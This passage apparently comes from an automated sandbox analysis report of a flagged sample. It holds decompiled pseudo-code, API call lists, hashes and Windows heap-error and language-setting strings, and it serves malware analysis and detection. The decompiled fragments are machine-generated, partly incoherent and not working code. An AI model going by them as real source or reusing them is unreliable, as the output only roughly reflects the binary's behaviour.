                          					__eflags =  *_t8;
                          					ExitProcess(_t17);
                          				}
                          				__edx = __edx + 1;
                          				__eflags = __edx;
                          				_t4 = __ax;
                          				__ax = __cx;
                          				__cx = _t4;
                          				if(__edx <= 0) {
                          					_pop(ss);
                          					_push(0x6d);
                          					asm("loope 0xffffffc3");
                          					__ebp = __esp;
                          					__eax =  *((intOrPtr*)(__esp + 8));
                          					__ecx =  *((intOrPtr*)(__eax + 0xa14));
                          					__esi = __eax + 0xc7c;
                          					__eax = E004191E0(__edi, __eax, __eax + 0xc7c,  *((intOrPtr*)(__eax + 0xa14)), 0, 0x36);
                          					goto L5;
                          				}
                          				 *_t10 =  *_t10 + _t10;
                          				_push(_t10);
                          				E004191E0(_t20);
                          				_t13 = RtlFreeHeap( *(_t23 + 0xc),  *(_t23 + 0x10),  *(_t23 + 0x14)); // executed
                          				return _t13;
                          			}
                          Instruction addresses: 0x00418923, 0x00418924, 0x0041894e, 0x00418958, 0x00418926, 0x00418927, 0x00418929, 0x0041892b, 0x0041892c, 0x0041892e, 0x00418931, 0x00418933, 0x00418936, 0x00418942, 0x0041894a, 0x00000000, 0x00418903, 0x00418906, 0x00418907, 0x0041891d, 0x00418921

                          APIs
                          • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: ExitFreeHeapProcess
                          • String ID:
                          • API String ID: 1180424539-0
                          • Opcode ID: f4c07f08e70274fe5969a5ba238bd53d72c6937873ebf5ecc56d9da218e84072
                          • Instruction ID: 2ca7b805f7778705d74f9d09f1563c9da4ba412d0acfcda959870e8aed924cc8
                          • Opcode Fuzzy Hash: f4c07f08e70274fe5969a5ba238bd53d72c6937873ebf5ecc56d9da218e84072
                          • Instruction Fuzzy Hash: 7601B1B52043057BD721DF58DC96FE77758EF84760F04409AF9485B242D930EE50CAE5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: ExitFreeHeapProcess
                          • String ID:
                          • API String ID: 1180424539-0
                          • Opcode ID: b15be104c320dfa4f44ef67500cef52cc1af5f29270f7141fdfe4c962698c0c7
                          • Instruction ID: 5bd50c8c3eb33e5b96021e555d33704aa5d1df429cc087b465dd648f0bfa85b0
                          • Opcode Fuzzy Hash: b15be104c320dfa4f44ef67500cef52cc1af5f29270f7141fdfe4c962698c0c7
                          • Instruction Fuzzy Hash: 87F0E2B52002147BCB15DF58CC49EE7379CEF48740F154599F9086B242C630E940CAF1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: MessagePostThread
                          • String ID:
                          • API String ID: 1836367815-0
                          • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                          • Instruction ID: 93bd109d16e53c8762968f959fe3c9c023db94cb098c15d1529cbaaabdda2f39
                          • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                          • Instruction Fuzzy Hash: F001D431A8022977E720AA959C03FFE772C5B00B55F04006EFF04BA1C2E6A8790542EA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: LookupPrivilegeValue
                          • String ID:
                          • API String ID: 3899507212-0
                          • Opcode ID: 0a07abca213fd1898abc626acc5bd91f107e72fdd67c15d3a60637870484657c
                          • Instruction ID: a1270247ef26ae8ef761aa800b0d1d2d5b176ed9c01364dbca8af8c15f65e25b
                          • Opcode Fuzzy Hash: 0a07abca213fd1898abc626acc5bd91f107e72fdd67c15d3a60637870484657c
                          • Instruction Fuzzy Hash: 85E0E5752142906FCB11CB69DC45E973FA8DF45240F044599FD8857203C4349414C7B4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID:
                          • API String ID: 3298025750-0
                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                          • Instruction ID: 4eb6e808868848e44fc4af0a2d328e43ee2ba6839a30e24a5e1d9ea2c08b961d
                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                          • Instruction Fuzzy Hash: 6BE012B1200209ABDB18EF99CC49EA777ACAF88750F018559FA085B242CA30E910CAB0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: LookupPrivilegeValue
                          • String ID:
                          • API String ID: 3899507212-0
                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                          • Instruction ID: 6b795ac81b365ad13cf9f2a9b204a9737006b755962b409e964d21a2d06fa60d
                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                          • Instruction Fuzzy Hash: 62E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0857241C934E950CBF5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID:
                          • API String ID: 621844428-0
                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                          • Instruction ID: c6ffa8f41277cedcd146721b33de4ab2dd662f0a832426917f21051448e796de
                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                          • Instruction Fuzzy Hash: 90D012716042147BD620DB99CC85FD7779CDF48790F018065FA1C5B241C531BA00C6E1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: aa504302374b86394f956a64c2b3b2bf601dcd67b5ab9d96385e61bba8b2cf4b
                          • Instruction ID: 243ba033f1fa935ed16f2785cc48698f715f6da06f3a2df43106aa4054c7ab8c
                          • Opcode Fuzzy Hash: aa504302374b86394f956a64c2b3b2bf601dcd67b5ab9d96385e61bba8b2cf4b
                          • Instruction Fuzzy Hash: 9BB09B719114D5C9D651D7A4460C7177A4477D4745F56C061D1420641B4778C095F6B5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Strings
                          • an invalid address, %p, xrefs: 0109B4CF
                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0109B47D
                          • read from, xrefs: 0109B4AD, 0109B4B2
                          • This failed because of error %Ix., xrefs: 0109B446
                          • *** An Access Violation occurred in %ws:%s, xrefs: 0109B48F
                          • *** then kb to get the faulting stack, xrefs: 0109B51C
                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0109B2DC
                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0109B39B
                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0109B476
                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0109B314
                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0109B305
                          • *** Inpage error in %ws:%s, xrefs: 0109B418
                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0109B38F
                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0109B3D6
                          • a NULL pointer, xrefs: 0109B4E0
                          • *** enter .exr %p for the exception record, xrefs: 0109B4F1
                          • <unknown>, xrefs: 0109B27E, 0109B2D1, 0109B350, 0109B399, 0109B417, 0109B48E
                          • The instruction at %p referenced memory at %p., xrefs: 0109B432
                          • The instruction at %p tried to %s , xrefs: 0109B4B6
                          • *** enter .cxr %p for the context, xrefs: 0109B50D
                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0109B2F3
                          • write to, xrefs: 0109B4A6
                          • The resource is owned exclusively by thread %p, xrefs: 0109B374
                          • *** Resource timeout (%p) in %ws:%s, xrefs: 0109B352
                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0109B323
                          • The resource is owned shared by %d threads, xrefs: 0109B37E
                          • The critical section is owned by thread %p., xrefs: 0109B3B9
                          • Go determine why that thread has not released the critical section., xrefs: 0109B3C5
                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0109B53F
                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0109B484
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                          • API String ID: 0-108210295
                          • Opcode ID: e4ae9e31c929a91e41132296ce40512f22bf8ab588279936a5b1937070ee35f8
                          • Instruction ID: 456981eda588d109beb15d67dbb1126519e2c845e8440bd8a6eff6dae8def42e
                          • Opcode Fuzzy Hash: e4ae9e31c929a91e41132296ce40512f22bf8ab588279936a5b1937070ee35f8
                          • Instruction Fuzzy Hash: 40810375A40200FFDF21AB09AC95EAF3B76FF56B62F498085F5841B252D761C401FAB2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 44%
                          			E010A1C06() {
                          				signed int _t27;
                          				char* _t104;
                          				char* _t105;
                          				intOrPtr _t113;
                          				intOrPtr _t115;
                          				intOrPtr _t117;
                          				intOrPtr _t119;
                          				intOrPtr _t120;
                          
                          				_t105 = 0xfc48a4;
                          				_t104 = "HEAP: ";
                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                          					_push(_t104);
                          					E00FEB150();
                          				} else {
                          					E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          				}
                          				_push( *0x10d589c);
                          				E00FEB150("Heap error detected at %p (heap handle %p)\n",  *0x10d58a0);
                          				_t27 =  *0x10d5898; // 0x0
                          				if(_t27 <= 0xf) {
                          					switch( *((intOrPtr*)(_t27 * 4 +  &M010A1E96))) {
                          						case 0:
                          							_t105 = "heap_failure_internal";
                          							goto L21;
                          						case 1:
                          							goto L21;
                          						case 2:
                          							goto L21;
                          						case 3:
                          							goto L21;
                          						case 4:
                          							goto L21;
                          						case 5:
                          							goto L21;
                          						case 6:
                          							goto L21;
                          						case 7:
                          							goto L21;
                          						case 8:
                          							goto L21;
                          						case 9:
                          							goto L21;
                          						case 0xa:
                          							goto L21;
                          						case 0xb:
                          							goto L21;
                          						case 0xc:
                          							goto L21;
                          						case 0xd:
                          							goto L21;
                          						case 0xe:
                          							goto L21;
                          						case 0xf:
                          							goto L21;
                          					}
                          				}
                          				L21:
                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                          					_push(_t104);
                          					E00FEB150();
                          				} else {
                          					E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          				}
                          				_push(_t105);
                          				E00FEB150("Error code: %d - %s\n",  *0x10d5898);
                          				_t113 =  *0x10d58a4; // 0x0
                          				if(_t113 != 0) {
                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                          						_push(_t104);
                          						E00FEB150();
                          					} else {
                          						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          					}
                          					E00FEB150("Parameter1: %p\n",  *0x10d58a4);
                          				}
                          				_t115 =  *0x10d58a8; // 0x0
                          				if(_t115 != 0) {
                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                          						_push(_t104);
                          						E00FEB150();
                          					} else {
                          						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          					}
                          					E00FEB150("Parameter2: %p\n",  *0x10d58a8);
                          				}
                          				_t117 =  *0x10d58ac; // 0x0
                          				if(_t117 != 0) {
                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                          						_push(_t104);
                          						E00FEB150();
                          					} else {
                          						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          					}
                          					E00FEB150("Parameter3: %p\n",  *0x10d58ac);
                          				}
                          				_t119 =  *0x10d58b0; // 0x0
                          				if(_t119 != 0) {
                          					L41:
                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                          						_push(_t104);
                          						E00FEB150();
                          					} else {
                          						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          					}
                          					_push( *0x10d58b4);
                          					E00FEB150("Last known valid blocks: before - %p, after - %p\n",  *0x10d58b0);
                          				} else {
                          					_t120 =  *0x10d58b4; // 0x0
                          					if(_t120 != 0) {
                          						goto L41;
                          					}
                          				}
                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                          					_push(_t104);
                          					E00FEB150();
                          				} else {
                          					E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          				}
                          				return E00FEB150("Stack trace available at %p\n", 0x10d58c0);
                          			}
                          Instruction addresses for the statements in the listing above, in listing order (the side-by-side address column of the original page; 0x00000000 marks a statement with no address of its own):
                          0x010a1c10 0x010a1c16 0x010a1c1e 0x010a1c3d 0x010a1c3e 0x010a1c20 0x010a1c35 0x010a1c3a
                          0x010a1c44 0x010a1c55 0x010a1c5a 0x010a1c65 0x010a1c67 0x00000000 0x010a1c6e
                          0x00000000 (32 consecutive entries, covering the 16 case labels and their goto statements)
                          0x010a1c67 0x010a1cdc 0x010a1ce5 0x010a1d04 0x010a1d05 0x010a1ce7 0x010a1cfc 0x010a1d01
                          0x010a1d0b 0x010a1d17 0x010a1d1f 0x010a1d25 0x010a1d30 0x010a1d4f 0x010a1d50 0x010a1d32
                          0x010a1d47 0x010a1d4c 0x010a1d61 0x010a1d67 0x010a1d68 0x010a1d6e 0x010a1d79 0x010a1d98
                          0x010a1d99 0x010a1d7b 0x010a1d90 0x010a1d95 0x010a1daa 0x010a1db0 0x010a1db1 0x010a1db7
                          0x010a1dc2 0x010a1de1 0x010a1de2 0x010a1dc4 0x010a1dd9 0x010a1dde 0x010a1df3 0x010a1df9
                          0x010a1dfa 0x010a1e00 0x010a1e0a 0x010a1e13 0x010a1e32 0x010a1e33 0x010a1e15 0x010a1e2a
                          0x010a1e2f 0x010a1e39 0x010a1e4a 0x010a1e02 0x010a1e02 0x010a1e08 0x00000000 0x00000000
                          0x010a1e08 0x010a1e5b 0x010a1e7a 0x010a1e7b 0x010a1e5d 0x010a1e72 0x010a1e77 0x010a1e95

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                          • API String ID: 0-2897834094
                          • Opcode ID: 7f62e3a7677f3e2dff62f09ea9661ac2898729fa00aa556d9cb78ef55597d745
                          • Instruction ID: 386d647f9bf340cc0f79b20e3492c45b47a87ffbd384c7b80e8ec8992e690b61
                          • Opcode Fuzzy Hash: 7f62e3a7677f3e2dff62f09ea9661ac2898729fa00aa556d9cb78ef55597d745
                          • Instruction Fuzzy Hash: 3661B03651A185DFD311BBC9E896E2573A5EB04B70F4D807FF949AF352C63C9840AB0A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
                          			E00FF3D34(signed int* __ecx) {
                          				signed int* _v8;
                          				char _v12;
                          				signed int* _v16;
                          				signed int* _v20;
                          				char _v24;
                          				signed int _v28;
                          				signed int _v32;
                          				char _v36;
                          				signed int _v40;
                          				signed int _v44;
                          				signed int* _v48;
                          				signed int* _v52;
                          				signed int _v56;
                          				signed int _v60;
                          				char _v68;
                          				signed int _t140;
                          				signed int _t161;
                          				signed int* _t236;
                          				signed int* _t242;
                          				signed int* _t243;
                          				signed int* _t244;
                          				signed int* _t245;
                          				signed int _t255;
                          				void* _t257;
                          				signed int _t260;
                          				void* _t262;
                          				signed int _t264;
                          				void* _t267;
                          				signed int _t275;
                          				signed int* _t276;
                          				short* _t277;
                          				signed int* _t278;
                          				signed int* _t279;
                          				signed int* _t280;
                          				short* _t281;
                          				signed int* _t282;
                          				short* _t283;
                          				signed int* _t284;
                          				void* _t285;
                          
                          				_v60 = _v60 | 0xffffffff;
                          				_t280 = 0;
                          				_t242 = __ecx;
                          				_v52 = __ecx;
                          				_v8 = 0;
                          				_v20 = 0;
                          				_v40 = 0;
                          				_v28 = 0;
                          				_v32 = 0;
                          				_v44 = 0;
                          				_v56 = 0;
                          				_t275 = 0;
                          				_v16 = 0;
                          				if(__ecx == 0) {
                          					_t280 = 0xc000000d;
                          					_t140 = 0;
                          					L50:
                          					 *_t242 =  *_t242 | 0x00000800;
                          					_t242[0x13] = _t140;
                          					_t242[0x16] = _v40;
                          					_t242[0x18] = _v28;
                          					_t242[0x14] = _v32;
                          					_t242[0x17] = _t275;
                          					_t242[0x15] = _v44;
                          					_t242[0x11] = _v56;
                          					_t242[0x12] = _v60;
                          					return _t280;
                          				}
                          				if(E00FF1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                          					_v56 = 1;
                          					if(_v8 != 0) {
                          						L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                          					}
                          					_v8 = _t280;
                          				}
                          				if(E00FF1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                          					_v60 =  *_v8;
                          					L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                          					_v8 = _t280;
                          				}
                          				if(E00FF1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                          					L16:
                          					if(E00FF1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                          						L28:
                          						if(E00FF1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                          							L46:
                          							_t275 = _v16;
                          							L47:
                          							_t161 = 0;
                          							L48:
                          							if(_v8 != 0) {
                          								L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                          							}
                          							_t140 = _v20;
                          							if(_t140 != 0) {
                          								if(_t275 != 0) {
                          									L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                          									_t275 = 0;
                          									_v28 = 0;
                          									_t140 = _v20;
                          								}
                          							}
                          							goto L50;
                          						}
                          						_t167 = _v12;
                          						_t255 = _v12 + 4;
                          						_v44 = _t255;
                          						if(_t255 == 0) {
                          							_t276 = _t280;
                          							_v32 = _t280;
                          						} else {
                          							_t276 = L01004620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                          							_t167 = _v12;
                          							_v32 = _t276;
                          						}
                          						if(_t276 == 0) {
                          							_v44 = _t280;
                          							_t280 = 0xc0000017;
                          							goto L46;
                          						} else {
                          							E0102F3E0(_t276, _v8, _t167);
                          							_v48 = _t276;
                          							_t277 = E01031370(_t276, 0xfc4e90);
                          							_pop(_t257);
                          							if(_t277 == 0) {
                          								L38:
                          								_t170 = _v48;
                          								if( *_v48 != 0) {
                          									E0102BB40(0,  &_v68, _t170);
                          									if(L00FF43C0( &_v68,  &_v24) != 0) {
                          										_t280 =  &(_t280[0]);
                          									}
                          								}
                          								if(_t280 == 0) {
                          									_t280 = 0;
                          									L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                          									_v44 = 0;
                          									_v32 = 0;
                          								} else {
                          									_t280 = 0;
                          								}
                          								_t174 = _v8;
                          								if(_v8 != 0) {
                          									L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                          								}
                          								_v8 = _t280;
                          								goto L46;
                          							}
                          							_t243 = _v48;
                          							do {
                          								 *_t277 = 0;
                          								_t278 = _t277 + 2;
                          								E0102BB40(_t257,  &_v68, _t243);
                          								if(L00FF43C0( &_v68,  &_v24) != 0) {
                          									_t280 =  &(_t280[0]);
                          								}
                          								_t243 = _t278;
                          								_t277 = E01031370(_t278, 0xfc4e90);
                          								_pop(_t257);
                          							} while (_t277 != 0);
                          							_v48 = _t243;
                          							_t242 = _v52;
                          							goto L38;
                          						}
                          					}
                          					_t191 = _v12;
                          					_t260 = _v12 + 4;
                          					_v28 = _t260;
                          					if(_t260 == 0) {
                          						_t275 = _t280;
                          						_v16 = _t280;
                          					} else {
                          						_t275 = L01004620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                          						_t191 = _v12;
                          						_v16 = _t275;
                          					}
                          					if(_t275 == 0) {
                          						_v28 = _t280;
                          						_t280 = 0xc0000017;
                          						goto L47;
                          					} else {
                          						E0102F3E0(_t275, _v8, _t191);
                          						_t285 = _t285 + 0xc;
                          						_v48 = _t275;
                          						_t279 = _t280;
                          						_t281 = E01031370(_v16, 0xfc4e90);
                          						_pop(_t262);
                          						if(_t281 != 0) {
                          							_t244 = _v48;
                          							do {
                          								 *_t281 = 0;
                          								_t282 = _t281 + 2;
                          								E0102BB40(_t262,  &_v68, _t244);
                          								if(L00FF43C0( &_v68,  &_v24) != 0) {
                          									_t279 =  &(_t279[0]);
                          								}
                          								_t244 = _t282;
                          								_t281 = E01031370(_t282, 0xfc4e90);
                          								_pop(_t262);
                          							} while (_t281 != 0);
                          							_v48 = _t244;
                          							_t242 = _v52;
                          						}
                          						_t201 = _v48;
                          						_t280 = 0;
                          						if( *_v48 != 0) {
                          							E0102BB40(_t262,  &_v68, _t201);
                          							if(L00FF43C0( &_v68,  &_v24) != 0) {
                          								_t279 =  &(_t279[0]);
                          							}
                          						}
                          						if(_t279 == 0) {
                          							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                          							_v28 = _t280;
                          							_v16 = _t280;
                          						}
                          						_t202 = _v8;
                          						if(_v8 != 0) {
                          							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                          						}
                          						_v8 = _t280;
                          						goto L28;
                          					}
                          				}
                          				_t214 = _v12;
                          				_t264 = _v12 + 4;
                          				_v40 = _t264;
                          				if(_t264 == 0) {
                          					_v20 = _t280;
                          				} else {
                          					_t236 = L01004620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                          					_t280 = _t236;
                          					_v20 = _t236;
                          					_t214 = _v12;
                          				}
                          				if(_t280 == 0) {
                          					_t161 = 0;
                          					_t280 = 0xc0000017;
                          					_v40 = 0;
                          					goto L48;
                          				} else {
                          					E0102F3E0(_t280, _v8, _t214);
                          					_t285 = _t285 + 0xc;
                          					_v48 = _t280;
                          					_t283 = E01031370(_t280, 0xfc4e90);
                          					_pop(_t267);
                          					if(_t283 != 0) {
                          						_t245 = _v48;
                          						do {
                          							 *_t283 = 0;
                          							_t284 = _t283 + 2;
                          							E0102BB40(_t267,  &_v68, _t245);
                          							if(L00FF43C0( &_v68,  &_v24) != 0) {
                          								_t275 = _t275 + 1;
                          							}
                          							_t245 = _t284;
                          							_t283 = E01031370(_t284, 0xfc4e90);
                          							_pop(_t267);
                          						} while (_t283 != 0);
                          						_v48 = _t245;
                          						_t242 = _v52;
                          					}
                          					_t224 = _v48;
                          					_t280 = 0;
                          					if( *_v48 != 0) {
                          						E0102BB40(_t267,  &_v68, _t224);
                          						if(L00FF43C0( &_v68,  &_v24) != 0) {
                          							_t275 = _t275 + 1;
                          						}
                          					}
                          					if(_t275 == 0) {
                          						L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                          						_v40 = _t280;
                          						_v20 = _t280;
                          					}
                          					_t225 = _v8;
                          					if(_v8 != 0) {
                          						L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                          					}
                          					_v8 = _t280;
                          					goto L16;
                          				}
                          			}
                          Instruction addresses for the statements in the listing above, in listing order (the side-by-side address column of the original page; the column ends here in the extracted page, and 0x00000000 marks a statement with no address of its own):
                          0x00ff3d3c 0x00ff3d42 0x00ff3d44 0x00ff3d46 0x00ff3d49 0x00ff3d4c 0x00ff3d4f 0x00ff3d52
                          0x00ff3d55 0x00ff3d58 0x00ff3d5b 0x00ff3d5f 0x00ff3d61 0x00ff3d66 0x01048213 0x01048218
                          0x00ff4085 0x00ff4088 0x00ff408e 0x00ff4094 0x00ff409a 0x00ff40a0 0x00ff40a6 0x00ff40a9
                          0x00ff40af 0x00ff40b6 0x00ff40bd 0x00ff40bd 0x00ff3d83 0x0104821f 0x01048229 0x01048238
                          0x01048238 0x0104823d 0x0104823d 0x00ff3da0 0x00ff3daf 0x00ff3db5 0x00ff3dba 0x00ff3dba
                          0x00ff3dd4 0x00ff3e94 0x00ff3eab 0x00ff3f6d 0x00ff3f84 0x00ff406b 0x00ff406b 0x00ff406e
                          0x00ff406e 0x00ff4070 0x00ff4074 0x01048351 0x01048351 0x00ff407a 0x00ff407f 0x0104835d
                          0x01048370 0x01048377 0x01048379 0x0104837c 0x0104837c 0x0104835d 0x00000000 0x00ff407f
                          0x00ff3f8a 0x00ff3f8d 0x00ff3f90 0x00ff3f95 0x0104830d 0x0104830f 0x00ff3f9b 0x00ff3fac
                          0x00ff3fae 0x00ff3fb1 0x00ff3fb1 0x00ff3fb6 0x01048317 0x0104831a 0x00000000 0x00ff3fbc
                          0x00ff3fc1 0x00ff3fc9 0x00ff3fd7 0x00ff3fda 0x00ff3fdd 0x00ff4021 0x00ff4021 0x00ff4029
